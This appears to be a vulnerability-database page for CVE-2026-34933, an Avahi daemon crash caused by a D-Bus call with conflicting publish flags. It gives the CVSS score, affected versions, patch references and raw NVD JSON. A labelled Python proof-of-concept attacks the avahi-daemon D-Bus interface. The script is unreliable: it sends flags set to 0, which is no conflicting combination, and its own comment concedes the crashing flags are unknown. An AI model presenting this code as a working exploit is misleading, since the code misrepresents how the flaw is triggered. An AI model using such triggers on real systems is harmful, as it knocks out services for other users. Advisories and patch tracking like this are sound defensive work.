CVE-2026-34933

Description

Avahi is a system which facilitates service discovery on a local network via the mDNS/DNS-SD protocol suite. Prior to version 0.9-rc4, any unprivileged local user can crash avahi-daemon by sending a single D-Bus method call with conflicting publish flags. This issue has been patched in version 0.9-rc4.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:avahi:avahi:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:avahi:avahi:0.9:rc1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:avahi:avahi:0.9:rc2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:avahi:avahi:0.9:rc3:*:*:*:*:*:* - VULNERABLE

Avahi < 0.9-rc4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
PoC for CVE-2026-34933
Avahi D-Bus Crash via conflicting publish flags
This script demonstrates the vector for triggering the crash.
"""

import dbus
import sys

def trigger_crash():
    try:
        print("[*] Connecting to the System D-Bus...")
        bus = dbus.SystemBus()

        # Get the Avahi server object
        server_obj = bus.get_object("org.freedesktop.Avahi", "/")
        server = dbus.Interface(server_obj, "org.freedesktop.Avahi.Server")

        print("[*] Creating a new EntryGroup...")
        entry_group_path = server.EntryGroupNew()
        entry_group_obj = bus.get_object("org.freedesktop.Avahi", entry_group_path)
        entry_group = dbus.Interface(entry_group_obj, "org.freedesktop.Avahi.EntryGroup")

        print("[*] Sending malicious AddService call with conflicting flags...")
        # The vulnerability is triggered by specific conflicting flags in the publish field.
        # This call attempts to register a service with parameters that may trigger the vulnerability.
        # Note: Exact flag combinations to cause crash depend on specific version logic.
        
        entry_group.AddService(
            -1,         # Interface (AVAHI_IF_UNSPEC)
            -1,         # Protocol (AVAHI_PROTO_UNSPEC)
            0,          # Flags (The vulnerable field)
            "PoC Service", 
            "_http._tcp", 
            "local", 
            "localhost", 
            1234, 
            dbus.Array([], signature='ay')
        )

        entry_group.Commit()
        print("[+] D-Bus call sent. Check avahi-daemon status.")

    except dbus.exceptions.DBusException as e:
        print(f"[-] D-Bus Exception occurred: {e}")
        print("[!] This might indicate the daemon crashed (connection lost).")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    trigger_crash()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34933
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34933
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34933/
[4] VulDB https://vuldb.com/cve/CVE-2026-34933
[5] https://github.com/avahi/avahi/commit/625ca0fac19229f6dfa3a6c6b698ae657187e50c
[6] https://github.com/avahi/avahi/pull/891
[7] https://github.com/avahi/avahi/security/advisories/GHSA-w65r-6gxh-vhvc
[8] http://www.openwall.com/lists/oss-security/2026/04/11/9
[9] https://github.com/avahi/avahi/security/advisories/GHSA-w65r-6gxh-vhvc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34933", "sourceIdentifier": "[email protected]", "published": "2026-04-03T23:17:05.377", "lastModified": "2026-04-13T17:26:03.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Avahi is a system which facilitates service discovery on a local network via the mDNS/DNS-SD protocol suite. Prior to version 0.9-rc4, any unprivileged local user can crash avahi-daemon by sending a single D-Bus method call with conflicting publish flags. This issue has been patched in version 0.9-rc4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:avahi:avahi:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.9", "matchCriteriaId": "6481267F-934F-4A0C-9B25-59738E798458"}, {"vulnerable": true, "criteria": "cpe:2.3:a:avahi:avahi:0.9:rc1:*:*:*:*:*:*", "matchCriteriaId": "76971590-AEED-4CB1-B7B7-45EA8FD11524"}, {"vulnerable": true, "criteria": "cpe:2.3:a:avahi:avahi:0.9:rc2:*:*:*:*:*:*", "matchCriteriaId": "83D94AE4-46AC-4955-BB0D-193CF79149A1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:avahi:avahi:0.9:rc3:*:*:*:*:*:*", "matchCriteriaId": "42B0E12E-E0CC-47B5-B7D3-9FF12156B68E"}]}]}], "references": [{"url": "https://github.com/avahi/avahi/commit/625ca0fac19229f6dfa3a6c6b698ae657187e50c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/avahi/avahi/pull/891", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/avahi/avahi/security/advisories/GHSA-w65r-6gxh-vhvc", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/11/9", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Exploit", "Mailing List", "Third Party Advisory"]}, {"url": "https://github.com/avahi/avahi/security/advisories/GHSA-w65r-6gxh-vhvc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}